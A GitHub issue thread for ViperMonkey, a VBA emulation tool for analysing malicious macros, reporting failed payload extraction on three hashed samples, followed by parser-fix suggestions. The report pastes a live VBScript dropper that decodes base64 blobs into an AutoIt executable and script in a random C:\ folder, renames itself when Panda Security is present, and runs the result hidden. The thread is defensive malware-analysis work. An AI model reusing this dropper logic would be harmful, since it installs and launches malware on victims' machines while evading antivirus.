search

kirk-sayre-work / ViperMonkey

A VBA parser and emulation engine to analyze malicious macros.
90 stars 14 forks source link

No payload extracted from vbscript #18

Open harold-ogden-walmart opened 4 years ago

harold-ogden-walmart commented 4 years ago

df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b d62b0beb27e3b97923f9263a379492bfdf08a3dbcbb16c0af5a86420f5b74012 3dffb392f186abf80646ef2375f8989dbde3beba249ea374deddb690fa77b9a7

Sample payload:

dim FileObject, MSXml2,basee64,tipo,FolderTarget,AutoitName:Set FileObject = CreateObject("Scripting.FileSystemObject"):if FileObject.GetParentFolderName(WScript.ScriptFullName) = "C:\" then:wscript.quit:end if:FolderTarget = "C:\" + RandomString + "\":FileObject.CreateFolder(FolderTarget):AutoitName = RandomString + ".exe":if FileObject.FolderExists("%ALLUSERSPROFILE%\Panda Security") then:AutoitName = "autoit.exe":end if:AutoitScriptName = RandomString + ".au3":Set MSXml2 = CreateObject("MSXml2.DOMDocument"):Set basee64 = MSXml2.createElement("Base64Data"):Set tipo = CreateObject("ADODB.Stream"):basee64.DataType = "bin.base64":tipo.Type = 1:PAZ = replace(PAZ,"KZMiEq",""):basee64.text = PAZ:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitName, 2:tipo.close:Set objFile = FileObject.CreateTextFile(FolderTarget+"pe.bin",True):objFile.Write rGP:objFile.Close:basee64.text = yWi:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitScriptName, 2:tipo.close:CreateObject("Shell.Application").ShellExecute FolderTarget+AutoitName, AutoitScriptName, FolderTarget, "open", 0:Set objFile = FileObject.CreateTextFile(FileObject.GetSpecialFolder(2) + "\test.txt",True):objFile.Write Wscript.ScriptName:objFile.Close:Function RandomString:Dim tmpdata:Randomize:For i = 1 to 8 :tmpdata = tmpdata & Mid("abcdefghijklmnopqrstuvwxyz0123456789", Int((24)*rnd+1),1):Next:RandomString = tmpdata:End Function; C:\scmbrnqn\mthlucts.exe; C:\scmbrnqn\mthlucts.exe klhcrdkv.au3

malvidin commented 3 years ago

For df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b, it doesn't return anything even when the -i/--init entry_point is set to qmZlPQ.

malvidin commented 2 years ago

The issue may be in core/statements.py for simple_statement and simple_statement_restricted. Changing the first line for each to the the following works on a couple samples, but I did not check if it breaks anything.

    NotAny(Regex(r"End[ \t]Sub|End[ \t]Function", flags=re.IGNORECASE))

This works as well:

    NotAny(CaselessKeyword("End") + (CaselessKeyword("Sub") | CaselessKeyword("Function")))

If this is used in vba_collapse_long_lines(vba_code) 

return re.sub(r'[ \t]+_[ \t]*(\r\n|\r|\n)[ \t]*', ' ', vba_code)